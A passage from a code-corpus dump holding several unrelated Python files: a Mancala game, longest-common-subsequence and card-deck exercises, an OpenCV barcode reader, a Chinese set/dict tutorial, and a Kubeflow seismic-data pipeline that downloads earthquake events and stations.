'-' + '----'*BOARD_SIZE + '{:^3}'\n print(fmt.format(self.mancala(other_player),\n self.mancala(this_player))) # Mancalas\n fmt = '###' + '|{:^3}'*BOARD_SIZE + '| {} '.format(self.player_letter(this_player))\n print(fmt.format(*self.holes(this_player))) # This player\n\n def display_current(self):\n # Visualise the board as text, from current player's perspective\n self.display_player(self.turn)\n\n def __init__(self):\n # Board of 6 holes each side plus two mancalas\n self.board = 3*np.ones(BOARD_SIZE*2 + 2, dtype=int)\n self.board[MANCALA_A] = 0\n self.board[MANCALA_B] = 0\n # Indicator for player turn\n self.turn = PLAYER_A\n\n def swap_players(self):\n self.turn = self.opponent()\n\n def completed(self):\n # Check for game completion\n remaining_seeds = sum(s for s in self.holes(PLAYER_A))\n if remaining_seeds == 0:\n # Game over, empty opponent's seeds into their mancala\n self.board[MANCALA_B] += sum(s for s in self.holes(PLAYER_B))\n self.board[self.hole_indices(PLAYER_B)] = 0\n return True\n remaining_seeds = sum(s for s in self.holes(PLAYER_B))\n if remaining_seeds == 0:\n # Game over, empty opponent's seeds into their mancala\n self.board[MANCALA_A] += sum(s for s in self.holes(PLAYER_A))\n self.board[self.hole_indices(PLAYER_A)] = 0\n return True\n return False\n\n def move(self, n):\n # Play current player's nth hole (n starts at zero)\n if n not in self.valid_moves():\n raise RuntimeError('Invalid move')\n\n if self.turn == PLAYER_A:\n hole = n\n this_mancala = MANCALA_A\n other_mancala = MANCALA_B\n else:\n hole = BOARD_SIZE + 1 + n\n this_mancala = MANCALA_B\n other_mancala = MANCALA_A\n # Remove seeds from this hole\n collected_seeds = self.board[hole]\n self.board[hole] = 0\n while collected_seeds > 0:\n hole = self.add_holes(hole, 1)\n if hole != other_mancala:\n # Not in opponent's mancala so put seed in\n self.board[hole] += 1\n collected_seeds -= 1\n # Decide what to do at end of move\n if (self.board[hole] == 1) & (hole in self.hole_indices(self.turn)):\n # Ended in own empty hole so capture opponent's pieces\n self.board[this_mancala] += self.board[hole]\n self.board[hole] = 0\n self.board[this_mancala] += self.board[self.opposite_hole(hole)]\n self.board[self.opposite_hole(hole)] = 0\n # Check for end of game\n if self.completed():\n return\n if hole != this_mancala:\n # Not in mancala so play passes to opponent\n self.swap_players()\n\n\nif __name__ == '__main__':\n print('Mancala game\\n')\n game = mancala()\n\n while not game.completed():\n print('Player ' + game.player_letter(game.turn) + ' to play:')\n game.display_current()\n move = 0\n while move == 0:\n try:\n move = int(input('Enter a move (1 to {}): '.format(BOARD_SIZE)))\n except ValueError:\n print('Invalid move')\n move = 0\n try:\n game.move(move - 1)\n except RuntimeError:\n print('Invalid move')\n move = 0\n print('')\n\n if game.winning_player() == DRAW:\n print('Game over: DRAW')\n if game.winning_player() == PLAYER_A:\n print('Player A wins')\n else:\n print('Player B wins')\n game.display_player(PLAYER_A)\n\n\n\n\n\n\n\n\n\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"80649822","text":"class Solution:\n def lcs_iterative(self, string1, string2):\n m = len(string1)\n n = len(string2)\n\n dp = [[0 for i in range(m+1)] for j in range(n+1)]\n for row in dp:\n print(row)\n print()\n\n for i in range(1, n+1):\n for j in range(1, m+1):\n if string2[i-1] == string1[j-1]:\n dp[i][j] = 1 + dp[i-1][j-1]\n else:\n dp[i][j] = max(dp[i-1][j],\n dp[i][j-1])\n for row in dp:\n print(row)\n return dp[-1][-1]\n\n def lcs_recursive(self, string1, string2, m, n):\n if m < 0 or n < 0:\n return 0\n\n if string1[m] == string2[n]:\n return 1 + self.lcs_recursive(string1, string2, m-1, n-1)\n else:\n return max(self.lcs_recursive(string1, string2, m-1, n),\n self.lcs_recursive(string1, string2, m, n-1))\n\n def solve(self, str1, str2):\n a = len(str1)\n b = len(str2)\n ans1 = self.lcs_recursive(str1, str2, a-1, b-1)\n print(f'recursive ans is {ans1}')\n ans2 = self.lcs_iterative(str1, str2)\n print(f'iterative ans is {ans2}')\n\n\nif __name__ == '__main__':\n a = 'rabb'\n b = 'rab'\n obj = Solution()\n obj.solve(a, b)\n","sub_path":"scaler/dp2/dp2/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"378632656","text":"'''\nIn a deck of cards, each card has an integer written on it.\n\nReturn true if and only if you can choose X >= 2 such that it is possible to split the entire deck into 1 or more groups of cards, where:\n\nEach group has exactly X cards.\nAll the cards in each group have the same integer.\n \n\nExample 1:\n\nInput: deck = [1,2,3,4,4,3,2,1]\nOutput: true\nExplanation: Possible partition [1,1],[2,2],[3,3],[4,4].\n\nhttps://leetcode.com/problems/x-of-a-kind-in-a-deck-of-cards/\n'''\n\nfrom typing import List\nfrom collections import Counter\nfrom math import gcd\n\nclass Solution:\n # solution 1\n def hasGroupsSizeX(self, deck: List[int]) -> bool:\n count = Counter(deck)\n print('count = ', count)\n\n key_min = min(count.keys(), key = (lambda k: count[k]))\n count_min = count[key_min] + 1\n # print('min count = ', count[key_min])\n \n for i in range(2, count_min):\n if all(v % i == 0 for v in count.values()):\n return True \n \n return False\n \n # soluction 2\n def hasGroupsSizeX1(self, deck: List[int]) -> bool:\n return reduce(gcd, Counter(deck).values) >= 2\n\n\nif __name__ == '__main__':\n s = Solution()\n\n deck1 = [1,2,3,4,4,3,2,1];\n assert s.hasGroupsSizeX(deck1) == True\n deck2 = [1]\n assert s.hasGroupsSizeX(deck2) == False\n deck3 = [1,1,1,2,2,2,3,3]\n assert s.hasGroupsSizeX(deck3) == False\n deck4 = [1,1]\n assert s.hasGroupsSizeX(deck4) == True\n deck5 = [1,1,2,2,2,2]\n assert s.hasGroupsSizeX(deck5) == True\n deck6 = [1,1,1,1,2,2,2,2,2,2]\n assert s.hasGroupsSizeX(deck6) == True","sub_path":"src/python/array/x_of_a_kind_in_a_deck_of_cards.py","file_name":"x_of_a_kind_in_a_deck_of_cards.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"505393479","text":"import cv2 as cv\nimport numpy as np\nfrom math import pi, log\n\nBARCODE_CONVERSION = {3211: 0,2221: 1, 2122: 2, 1411: 3, 1132: 4, 1231: 5, 1114: 6, 1312: 7, 1213: 8, 3112: 9}\n\ndef get_image(src):\n\t\"\"\"Read in the image file from its location in memory and return image object.\n\t\n\tParameters: \n\t\tsrc (string): filepath to image\n\n\tReturns:\n\t\tndarray: image in RGB format\n\t\"\"\"\n\n\treturn cv.imread(src)\n\ndef preprocess_image(image):\n\t\"\"\"Takes a cropped image of a barcode and returns a white-padded image with straightened bars.\n\n\t\n\tParameters:\n\t\timage (ndarray): image in RGB format\n\n\tReturns:\n\t\tndarray: white padded image with straightened black bars in GRAY format\n\t\"\"\"\n\n\tgray = cv.cvtColor(image, cv.COLOR_BGR2GRAY) \n\tret,BW = cv.threshold(gray,0,255,cv.THRESH_BINARY+cv.THRESH_OTSU)\n\tstraight = reorient(BW)\n\t#vert = create_vertical_lines(straight)\n\tpadded = cv.copyMakeBorder(straight,5,5,5,5,cv.BORDER_CONSTANT,value = 255)\n\t#ret,BW = cv.threshold(padded,127,255,0)\n\treturn padded\n\ndef create_vertical_lines(image,threshold = (255//2)+50):\n\t\"\"\"Takes an image and fills every column that has an average value of less than threshold with black and every other column with white.\n\n\tParameters:\n\t\timage (ndarray): GRAY formatted image\n\t\tthreshold (int): average value that a column must exceed to be filled with white\n\n\tReturns:\n\t\tndarray: black and white GRAY formatted image with each column being entirely white or black based on average value compared to threshold\n\t\"\"\"\n\n\tw,h = image.shape\n\tvline_colors = np.where(np.average(image,axis = 0)>=threshold,255,0)\n\treturn np.uint8(vline_colors*np.ones((w,h)))\n\n\ndef draw_contours(gray_image,contours,cnt_color = (0,255,0), thickness = 1):\n\t\"\"\"Draws given contours on image.\n\n\tParameters:\n\t\tgray_image (ndarray): GRAY formatted image to have contours drawn on\n\t\tcontours (list): List of contours in cv contours format\n\t\tcnt_color (tuple): RGB value to draw contour in\n\t\tthickness (int): thickness to draw contours in\n\n\n\tReturn:\n\t\tndarray: image in RGB format with contours drawn on it in cnt_color \n\t\"\"\"\n\n\tcolor = cv.cvtColor(gray_image,cv.COLOR_GRAY2BGR)\n\tcv.drawContours(color,contours,-1,cnt_color, thickness)\n\treturn color\n\t\ndef show_image(image):\n\t\"\"\"Shows image in new window titled image and waits for any keystroke to terminate.\n\n\tParameters:\n\t\timage (ndarray): image to be displayed\n\t\"\"\"\n\n\tcv.imshow(\"image\",image)\n\tcv.waitKey(0)\n\ndef make_box(rectangles):\n\t\"\"\"Converts list of rectangles to np array of integer corner points \n\n\tParameters:\n\t\trectangles (array-like): list of rectangles in cv minAreaRectangle format\n\n\tReturns: \n\t\tnp array: list containing corner points of each rectangle in a tuple\n\t\"\"\"\n\treturn np.array([np.int0(cv.boxPoints(tuple(rect))) for rect in rectangles])\n\ndef classify(widths):\n\t\"\"\"Takes a series of single colored (either black or white) bar widths from barcode and \n\tconverts it into a list of classifications, where each bar width is classified into one \n\tof {1,2,3,4} based on relative width.\n\n\tParameters:\n\t\twidths (list): list of floats representing the widths of bars\n\n\tReturns:\n\t\tnp array: list of same length of widths where each element represents the classification \n\t\t\t\t\tthe corresponding width in widths\n\n\t \"\"\"\n\n\tminimum = (widths[0]+widths[-1])/2\n\tfirst_bin = np.average([x for x in widths if round(x/minimum)==1])\n\tsecond_bin = np.average([x for x in widths if round(x/first_bin) == 2])\n\tstep_size = np.max([second_bin/2,first_bin])\n\tbins = np.array([first_bin,second_bin,3*step_size,4*step_size])\n\t\n\tclsfy = np.vectorize(lambda x: np.argmin(np.abs(bins-np.array([x]*4)))+1)\n\t\n\treturn clsfy(widths)\n\ndef space_between_rects(rects):\n\t\"\"\"Finds the amount of space between each consecutive rectangle\n\t\n\tParameters: \n\t\trects (ndarray): list of rectangles in cv minAreaRectangle format\n\n\tReturns:\n\t\tnp array: element i corresponds to the distance between rects[i] and rects[i+1]\n\t\"\"\"\n\n\treturn np.array([rects[i+1][0][0]-rects[i][0][0]-(rects[i+1][1][0]+rects[i][1][0])/2 for i in range(len(rects)-1)])\n\ndef interleave(list1,list2):\n\t\"\"\"Interleaves two lists\n\n\tParaemters:\n\t\tlist1 (np array): first list of size n to be interleaved \n\t\tlist2 (np array): second list of size n or n-1 to be interleaved\n\n\tReturns:\n\t\tnp array: Both lists interleaved with first list going first.\n\t\"\"\"\n\n\tout = np.empty((list1.size+list2.size))\n\tout[::2] = list1\n\tout[1::2] = list2\n\treturn out\n\ndef reverse(num):\n\tnum_str = str(num)\n\tnum_str = num_str[::-1]\n\treturn int(num_str)\n\ndef get_closest_codes(num):\n\tmin_dist = 16\n\tclosest_codes = [] \n\tfor code in BARCODE_CONVERSION.keys():\n\t\tdistance = sum([abs(int(n)-int(m)) for n,m in zip(str(code),str(num))])\n\t\tif distance < min_dist:\n\t\t\tclosest_codes = [code]\n\t\t\tmin_dist = distance\n\t\telif distance == min_dist:\n\t\t\tclosest_codes.append(code)\n\n\treturn [BARCODE_CONVERSION[code] for code in closest_codes]\n\n\ndef code_to_num(code):\n\t\"\"\"Returns barcode number corresponding to 4 digit barcode code\n\n\tParameters:\n\t\tcode (int): four digit code to be translated\n\n\tReturns:\n\t\tint: barcode number corresponding to code\n\t\"\"\"\n\n\tif code in BARCODE_CONVERSION:\n\t\treturn BARCODE_CONVERSION[code]\n\telif reverse(code) in BARCODE_CONVERSION:\n\t\treturn BARCODE_CONVERSION[reverse(code)]\n\telse:\n\t\treturn -1\n\ndef recover_barcode(translated,original):\n\tcheck = (-3*sum([i for i in translated[0::2] if not i == -1]) - sum([i for i in translated[1:11:2] if not i == -1]))%10\n\tindices = [i for i,num in enumerate(translated) if num == -1]\n\tsubstitutes = [get_closest_codes(original[i]) for i in indices]\n\tfind_matching(indices,substitutes,check,translated[-1],translated)\n\treturn translated\n\n\ndef find_matching(indices,substitutes,check,checksum,translated):\n\tif len(substitutes) == 0:\n\t\treturn True\n\tfor substitute in substitutes[0]:\n\t\tif indices[0] % 2 == 1 and indices[0] < 11:\n\t\t\tnew_check = (check - substitute)%10\n\t\telif indices[0] == 11:\n\t\t\tchecksum = substitute\n\t\t\tnew_check = check\n\t\telse:\n\t\t\tnew_check = (check - 3*substitute)%10\n\n\t\tif len(indices)>1:\n\t\t\ttranslated[indices[0]] = substitute\n\t\t\tif find_matching(indices[1:],substitutes[1:],new_check,checksum,translated):\n\t\t\t\treturn True\n\t\t\ttranslated[indices[0]] = -1\n\t\telif checksum == new_check: #base case\n\t\t\ttranslated[indices[0]] = substitute\n\t\t\treturn True\n\treturn False\n\n\ndef translate_to_numbers(list1):\n\t\"\"\"Takes list of sequential classified barcode widths and translates them to a UPC number. Puts -1 in places where the set of four digits doesn't correspond to a code.\n\n\tParameters: \n\t\tlist1 (list): list of values in {1,2,3,4} where every four values corresponds to a digit in the UPC number\n\n\tReturns:\n\t\tlist: list with each element being a the next digit of the UPC number\n\t\"\"\"\n\n\tif len(list1) % 4 != 0:\n\t\treturn [-1]*12\n\n\tcode = np.int0((np.array([1000,100,10,1]*(len(list1)//4))*list1))\n\tcode = code.reshape((len(list1)//4,4))\n\tcode = np.sum(code,axis=1)\n\ttranslate = np.vectorize(code_to_num)\n\ttranslated = translate(code)\n\t\n\tif -1 in translated:\n\t\ttranslated = recover_barcode(translated,code)\n\n\treturn translated\n\ndef straighten_rectangles(rects):\n\t\"\"\"Takes all rectangles that are more than -45 degrees tilted and re-encodes them as a rectangle with angle 90 + original angle\n\n\tParameters:\n\t\trects (array-like): list of rectangles in cv minAreaRect format\n\n\tReturns:\n\t\tlist: Same list of rectangles where no rectangle has angle less than -45 degrees. \n\t\"\"\"\n\n\tdef flip_rect(rect):\n\t\tif rect[2] < -45:\n\t\t\treturn (rect[0],(rect[1][1],rect[1][0]),rect[2]+90)\n\t\treturn rect\n\n\treturn [flip_rect(rect) for rect in rects]\n\ndef get_barcode_rectangles(processed_image):\n\t\"\"\"Takes a cropped GRAY image of a barcode and returns a list of rectangles representing the black bars on the barcode\n\n\tParameters:\n\t\tprocessed_image (ndarray): image in GRAY format of barcode, already cropped and preprocessed (see preprocess image)\n\n\tReturns:\n\t\tnp array: rectangles corresponding to black barcode bars in cv minAreaRect format sorted by increasing x value in image \n\t\"\"\"\n\t\n\tcontours, hierarchy = cv.findContours(processed_image, mode=cv.RETR_LIST, method=cv.CHAIN_APPROX_SIMPLE)\n\n\trectangles = np.array([cv.minAreaRect(cnt) for cnt in contours])\n\trectangles = straighten_rectangles(rectangles)\n\n\timage_with_barcodes = draw_contours(processed_image,make_box(rectangles))\n\n\tbarcode_rectangles = np.array([rect for rect in rectangles if rect[1][0] != 0 and rect[1][1]/rect[1][0] >= 5]) #changed 5 to 3\n\timage_with_barcodes = draw_contours(processed_image,make_box(barcode_rectangles))\n\n\tbarcode_center_y = np.median([rect[0][1] for rect in barcode_rectangles])\n\tbarcode_height = np.median([rect[1][1] for rect in barcode_rectangles])\n\n\tbarcode_rectangles = np.array([rect for rect in barcode_rectangles if np.abs(rect[0][1]-barcode_center_y) < barcode_height/2])\n\timage_with_barcodes = draw_contours(processed_image,make_box(barcode_rectangles))\n\n\tordered_barcode_rectangles = np.array(sorted(barcode_rectangles,key=lambda x:x[0][0]))\n\treturn ordered_barcode_rectangles\n\ndef measure_bars(processed_image):\n\th,w = processed_image.shape\n\theights = [h//3,h//2,2*h//3]\n\tbinary_image = processed_image>0\n\n\twidths = []\n\tfor height in heights:\n\t\twidth = []\n\t\trow = binary_image[height]\n\t\tprev = 1\n\t\tprev_transition_index = 0\n\t\tfor i in range(len(row)):\n\t\t\tif row[i] != prev:\n\t\t\t\twidth.append(i - prev_transition_index)\n\t\t\t\tprev = row[i]\n\t\t\t\tprev_transition_index = i\n\t\tif len(width) == 60:\n\t\t\twidths.append(width[1:-1])\n\treturn np.average(widths,axis=0)\n\ndef classify_widths(widths):\n\tgaps = classify(widths[1::2])\n\tbars = classify(widths[0::2])\n\tfull_code = interleave(bars,gaps)\n\tfull_code = np.concatenate((full_code[3:27],full_code[32:56]))\n\treturn full_code\n\ndef classify_bars(ordered_barcode_rectangles):\n\t\"\"\"Takes a list of black barcode rectangles and returns the classified widths of all of the bars in the image (black and white) in increasing x order\n\n\tParameters:\n\t\tordered_barcode_rectangles (array-like): rectangles in cv minAreaRect format corresponding to black bars in barcode in increasing x order in image\n\n\tReturns:\n\t\tnp array: list of bar-width classifications for all bars in barcode in increasing x order\n\t\"\"\"\n\n\tgaps = classify(space_between_rects(ordered_barcode_rectangles))\n\tbars = classify(np.array([rect[1][0] for rect in ordered_barcode_rectangles]))\n\tfull_code = interleave(bars,gaps)\n\tfull_code = np.concatenate((full_code[3:27],full_code[32:56]))\n\treturn full_code\n\n\ndef get_UPC(img):\n\t\"\"\"Returns UPC code for cropped barcode image\n\n\tParameters:\n\t\timg (ndarra): image object of cropped barcode\n\n\tReturns:\n\t\tlist: UPC barcode where each digit is an element in the list\n\t\"\"\"\n\tprocessed_image = preprocess_image(img)\n\t#ordered_barcode_rectangles = get_barcode_rectangles(processed_image)\n\t#full_code = classify_bars(ordered_barcode_rectangles)\n\twidths = measure_bars(processed_image)\n\tfull_code = classify_widths(widths)\n\treturn list(translate_to_numbers(full_code))\n\ndef reorient(img):\n\t\"\"\"Takes rotated image of cropped barcode and rotates so that bars are vertical\n\n\tParameters:\n\t\timg (ndarray): cropped image of rotated barcode\n\n\tReturns:\n\t\tndarray: straightened barcode image\n\t\"\"\"\n\trows,cols = img.shape\n\timg = cv.copyMakeBorder(img,5,5,5,5,cv.BORDER_CONSTANT,value = 255)\n\trectangles = get_barcode_rectangles(img)\n\tmedian_angle = np.median([rect[2] for rect in rectangles])\n\tM = cv.getRotationMatrix2D((cols/2,rows/2),median_angle,1)\n\tdst = cv.warpAffine(img,M,(cols,rows),borderMode = cv.BORDER_CONSTANT,borderValue = 255)\n\treturn dst\n\n\ndef blank_mask(gray_img):\n\t\"\"\"Returns black image in GRAY format the shape of gray_img\n\n\tParameters:\n\t\tgray_img (ndarray): image in GRAY format for mask to be the same size as\n\n\tReturns:\n\t\tndarray: image the same size as gray_img with all pixels black\n\t\"\"\"\n\n\t_,mask = cv.threshold(np.uint8(gray_img),255,255,cv.THRESH_BINARY)\n\treturn mask\n\ndef std_rect(endpts):\n\t\"\"\"Returns the smallest rectangle whose edges are parallel to image edges that completely encompasses all points in endpts\n\n\tParameters:\n\t\tendpts (list): list of endpoints to construct rectangle around\n\n\tReturns:\n\t\ttuple: minimum x value, maximum x value, minimum y value, maximum y vale\n\t\"\"\"\n\n\tx_vals = [pt[0] for pt in endpts]\n\ty_vals = [pt[1] for pt in endpts]\n\treturn (min(x_vals),max(x_vals),min(y_vals),max(y_vals))\n\n\ndef isolate_barcode(img):\n\t\"\"\"Takes image file containing a barcode and returns an image file of the cropped barcode\n\n\tParameters:\n\t\timg (ndarray): image with barcode in BGR format\n\n\tReturns:\n\t\tndarray: cropped image of barcode in BGR format\n\t\"\"\"\n\timg = cv.resize(img,(1920,1080))\n\tgray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\tret,BW = cv.threshold(gray,0,255,cv.THRESH_BINARY+cv.THRESH_OTSU)\n\tedged = cv.Canny(BW, 50, 100, 2)\n\tblurred = cv.GaussianBlur(edged, (3, 3),0)#last gray\n\n\trectangles = get_barcode_rectangles(blurred)\n\tBW = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\tmask = blank_mask(BW)\n\tboxes = draw_contours(mask,make_box(rectangles),thickness = 5)\n\tboxes = cv.GaussianBlur(boxes, (15, 15),0)\n\n\tboxes = cv.dilate(boxes,None,iterations = 35)\n\n\tgray_boxes = cv.cvtColor(boxes, cv.COLOR_BGR2GRAY)\n\t_,BW_boxes = cv.threshold(np.uint8(gray_boxes),100,255,cv.THRESH_BINARY)\n\n\tcontours, hierarchy = cv.findContours(BW_boxes, mode=cv.RETR_LIST, method=cv.CHAIN_APPROX_SIMPLE)\n\trectangles = np.array([cv.minAreaRect(cnt) for cnt in contours])\n\tlargest_barcode_rectangle = np.array(sorted(rectangles,key=lambda x:x[1][0]*x[1][1],reverse=True))[0]\n\n\tminx, maxx, miny, maxy = std_rect(np.int0(cv.boxPoints(tuple(largest_barcode_rectangle))))\n\twidth = maxx - minx\n\theight = maxy - miny\n\n\tif minx<0:\n\t\tminx = 0\n\tif miny < 0:\n\t\tminy=0\n\n\t#barcode = img[max(int(miny - 0.1*width),0) :min(int(maxy + 0.1*width),1920),minx:maxx)\n\n\tbarcode = img[miny:maxy,minx:maxx]\n\t\n\treturn barcode","sub_path":"process_image/barcode_reader.py","file_name":"barcode_reader.py","file_ext":"py","file_size_in_byte":13675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"544494570","text":"#集合\n#构建集合的两种方法\n\nA={'a','b','c','c',1}#然后每个元素用逗号隔开,字符串类型的数据需要加定界符\n\nB=set('aabbcce')#注意使用的是小括号,所有元素放在一起\n#print(A,B)\n\n#集合之间的运算\n#集合的差(补)\n#print(A-B)\n#集合的并集\n#print(A|B)\n#集合的交集\n#print(A&B)\n#不同时包含\n#print(A^B)\n\n#集合的增删\n#添加元素的两种方法\n#A.add('d')\n#B.update({1,3},[4,2],'e')\n#print(A)\n#print(B)\n\n#删除元素的三种方法\n#A.remove('a')\n#B.remove('f')\n#A.discard('f')\n#A.pop()\n\n\n\n#字典\n\ndic={'name':'张','age':19,'school':'sctu'}\n\n#修改数据\ndic['name']='李四'\n#print(dic)\n\n#查找数据\n#dic.get('address')\n#dic.setdefault('name')\n#dic.setdefault('address',default='成都')\n#print(dic)\n\n#增加数据\n#dic['class']='1班'\n\n#删除数据\n#del dic['name']\n\ndic.pop('age')\nprint(dic)\n#dic.popitem()","sub_path":"1906101092董照岚/day0225/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"636440335","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# In[1]:\n\n\n#os.system('git clone -b factorize https://github.com/wayneweiqiang/PhaseNet.git')\n#os.system('git clone https://github.com/wayneweiqiang/GMMA.git')\n#os.system('conda env create quakeflow --file=env.yml')\n#os.system('conda activate quakeflow')\n#os.system('python -m ipykernel install --user --name=quakeflow')\n## select jupyter notebook kernel to quakflow\n\n\n# In[2]:\n\n\nimport kfp\nimport kfp.dsl as dsl\nimport kfp.components as comp\nfrom kfp.components import InputPath, OutputPath\n\n\n# In[12]:\n\n\nimport os\nimport matplotlib\nmatplotlib.use(\"agg\")\nimport matplotlib.pyplot as plt\n\ndir_name = \"ridgecrest\"\nif not os.path.exists(dir_name):\n os.mkdir(dir_name)\nroot_dir = lambda x: os.path.join(dir_name, x)\n\n\n# In[13]:\n\n\ndef set_config(index_pkl: OutputPath(\"pickle\"),\n config_pkl: OutputPath(\"pickle\"), \n datetime_pkl: OutputPath(\"pickle\")) -> list:\n \n import obspy\n import os\n import pickle\n import datetime\n import numpy as np\n \n pi = 3.1415926\n degree2km = pi*6371/180\n \n ## Location\n# center = (-115.53, 32.98) #salton sea\n center = (-117.504, 35.705) #ridgecrest\n horizontal_degree = 1.0\n vertical_degree = 1.0\n\n ## Time range\n# starttime = obspy.UTCDateTime(\"2020-10-01T00\") #salton sea\n# endtime = obspy.UTCDateTime(\"2020-10-03T00\") ## not included\n starttime = obspy.UTCDateTime(\"2019-07-04T00\") #ridgecrest\n endtime = obspy.UTCDateTime(\"2019-07-05T00\") ## not included\n\n ## seismic stations\n network_list = \"CI\"\n# channel_list = \"HNE,HNN,HNZ,HHE,HHN,HHZ,BHE,BHN,BHZ,EHE,EHN,EHZ\"\n channel_list = \"HHE,HHN,HHZ\"\n \n ## data center\n client = \"SCEDC\"\n\n ####### save config ########\n config = {}\n config[\"center\"] = center\n config[\"xlim_degree\"] = [center[0]-horizontal_degree/2, center[0]+horizontal_degree/2]\n config[\"ylim_degree\"] = [center[1]-vertical_degree/2, center[1]+vertical_degree/2]\n config[\"degree2km\"] = degree2km\n config[\"starttime\"] = starttime.datetime\n config[\"endtime\"] = endtime.datetime\n config[\"networks\"] = network_list\n config[\"channels\"] = channel_list\n config[\"client\"] = client\n\n with open(config_pkl, \"wb\") as fp:\n pickle.dump(config, fp)\n \n one_day = datetime.timedelta(days=1)\n one_hour = datetime.timedelta(hours=1)\n starttimes = []\n tmp_start = starttime\n while tmp_start < endtime:\n starttimes.append(tmp_start.datetime)\n tmp_start += one_hour\n \n with open(datetime_pkl, \"wb\") as fp:\n pickle.dump({\"starttimes\": starttimes, \"interval\": one_hour}, fp)\n \n num_parallel = 1\n \n idx = [[] for i in range(num_parallel)]\n for i in range(len(starttimes)):\n idx[i - i//num_parallel*num_parallel].append(i)\n \n with open(index_pkl, \"wb\") as fp:\n pickle.dump(idx, fp)\n\n return list(range(num_parallel))\n\n\n# In[18]:\n\n\nidx = set_config(root_dir(\"index.pkl\"), root_dir(\"config.pkl\"), root_dir(\"datetimes.pkl\"))\n# print(idx)\n# with open(root_dir(\"datetimes.pkl\"), \"rb\") as fp:\n# data = pickle.load(fp)\n# print(data)\n\n\n# In[19]:\n\n\nconfig_op = comp.func_to_container_op(set_config, \n base_image='python:3.8',\n packages_to_install= [\n \"numpy\",\n \"obspy\"\n ])\n\n\n# In[20]:\n\n\ndef download_events(config_pkl: InputPath(\"pickle\"),\n event_csv: OutputPath(str)):\n \n import pickle, os\n import obspy\n from obspy.clients.fdsn import Client\n from collections import defaultdict\n import pandas as pd\n# import matplotlib\n# matplotlib.use(\"agg\")\n# import matplotlib.pyplot as plt\n \n with open(config_pkl, \"rb\") as fp:\n config = pickle.load(fp)\n \n ####### IRIS catalog ########\n events = Client(\"IRIS\").get_events(starttime=config[\"starttime\"],\n endtime=config[\"endtime\"],\n minlongitude=config[\"xlim_degree\"][0],\n maxlongitude=config[\"xlim_degree\"][1],\n minlatitude=config[\"ylim_degree\"][0],\n maxlatitude=config[\"ylim_degree\"][1])#,\n# filename='events.xml')\n\n# events = obspy.read_events('events.xml')\n print(f\"Number of events: {len(events)}\")\n# events.plot('local', outfile=\"events.png\")\n# events.plot('local')\n\n ####### Save catalog ########\n catalog = defaultdict(list)\n for event in events:\n catalog[\"time\"].append(event.origins[0].time.datetime)\n catalog[\"magnitude\"].append(event.magnitudes[0].mag)\n catalog[\"longitude\"].append(event.origins[0].longitude)\n catalog[\"latitude\"].append(event.origins[0].latitude)\n catalog[\"depth(m)\"].append(event.origins[0].depth)\n catalog = pd.DataFrame.from_dict(catalog).sort_values([\"time\"])\n catalog.to_csv(event_csv,\n sep=\"\\t\", index=False, float_format=\"%.3f\",\n date_format='%Y-%m-%dT%H:%M:%S.%f',\n columns=[\"time\", \"magnitude\", \"longitude\", \"latitude\", \"depth(m)\"])\n\n ####### Plot catalog ########\n plt.figure()\n plt.plot(catalog[\"longitude\"], catalog[\"latitude\"], '.', markersize=1)\n plt.xlabel(\"Longitude\")\n plt.ylabel(\"Latitude\")\n plt.axis(\"scaled\")\n# plt.savefig(os.path.join(data_path, \"events_loc.png\"))\n # plt.show()\n \n plt.figure()\n plt.plot_date(catalog[\"time\"], catalog[\"magnitude\"], '.', markersize=1)\n plt.gcf().autofmt_xdate()\n plt.ylabel(\"Magnitude\")\n plt.title(f\"Number of events: {len(events)}\")\n# plt.savefig(os.path.join(data_path, \"events_mag_time.png\"))\n # plt.show()\n\n\n# In[21]:\n\n\ndownload_events(root_dir(\"config.pkl\"), root_dir(\"events.csv\"))\n\n\n# In[22]:\n\n\ndownload_events_op = comp.func_to_container_op(download_events, \n base_image='python:3.8',\n packages_to_install= [\n \"obspy\",\n \"pandas\",\n# \"matplotlib\"\n ])\n\n\n# In[23]:\n\n\ndef download_stations(config_pkl: InputPath(\"pickle\"),\n station_csv: OutputPath(str),\n station_pkl: OutputPath(\"pickle\")):\n \n import pickle, os\n import obspy\n from obspy.clients.fdsn import Client\n from collections import defaultdict\n import pandas as pd\n# import matplotlib\n# matplotlib.use(\"agg\")\n# import matplotlib.pyplot as plt\n \n with open(config_pkl, \"rb\") as fp:\n config = pickle.load(fp)\n\n ####### Download stations ########\n stations = Client(\"IRIS\").get_stations(network = config[\"networks\"],\n station = \"*\",\n starttime=config[\"starttime\"],\n endtime=config[\"endtime\"],\n minlongitude=config[\"xlim_degree\"][0],\n maxlongitude=config[\"xlim_degree\"][1],\n minlatitude=config[\"ylim_degree\"][0],\n maxlatitude=config[\"ylim_degree\"][1],\n channel=config[\"channels\"],\n level=\"response\")#,\n# filename=\"stations.xml\")\n\n# stations = obspy.read_inventory(\"stations.xml\")\n print(\"Number of stations: {}\".format(sum([len(x) for x in stations])))\n # stations.plot('local', outfile=\"stations.png\")\n # stations.plot('local')\n \n ####### Save stations ########\n station_locs = defaultdict(dict)\n for network in stations:\n for station in network:\n for chn in station:\n sid = f\"{network.code}.{station.code}.{chn.location_code}.{chn.code[:-1]}\"\n if sid in station_locs:\n station_locs[sid][\"component\"] += f\",{chn.code[-1]}\"\n station_locs[sid][\"response\"] += f\",{chn.response.instrument_sensitivity.value:.2f}\"\n else:\n component = f\"{chn.code[-1]}\"\n response = f\"{chn.response.instrument_sensitivity.value:.2f}\"\n dtype = chn.response.instrument_sensitivity.input_units.lower()\n tmp_dict = {}\n tmp_dict[\"longitude\"], tmp_dict[\"latitude\"], 